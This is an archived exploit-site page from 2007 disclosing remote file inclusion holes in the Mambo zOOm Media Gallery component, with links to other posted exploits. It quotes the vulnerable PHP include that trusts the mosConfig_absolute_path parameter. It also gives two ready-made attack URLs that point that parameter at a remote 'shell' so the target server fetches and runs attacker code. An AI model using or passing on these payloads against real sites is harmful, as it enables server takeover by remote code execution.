exploits , vulnerabilities , articles , Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities

2007-04-15 Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability
2007-04-12 Mambo Module Calendar (Agenda) 1.5.5 RFI Vulnerability
2007-04-12 Mambo Module Weather (absolute_path) RFI Vulnerability
2007-04-12 TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns
2007-04-11 Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

2007-04-12

Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities

Rated as : High Risk

iskorpitx@metlak
from TURKEY
com_zoom file include



******************************************************************************/

// Create the Makernote Parser and Interpreter Function Array

$GLOBALS['Makernote_Function_Array'] = array(  
"Read_Makernote_Tag" => array( ),
                                               
"get_Makernote_Text_Value" => array( ),
                                               
"Interpret_Makernote_to_HTML" => array( ) );


// Include the Main TIFF and EXIF Tags array

include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");

/******************************************************************************

http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://shell*
http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://shell*

iskorpitx

admin@siyamiozkan-mavideniz.org

securitydot.net - 2007-04-12

Exploits - newest 10 RSS | More

2007-06-15 55487 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32838 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40855 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28509 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19070 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16127 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18737 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16014 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32677 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16644 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit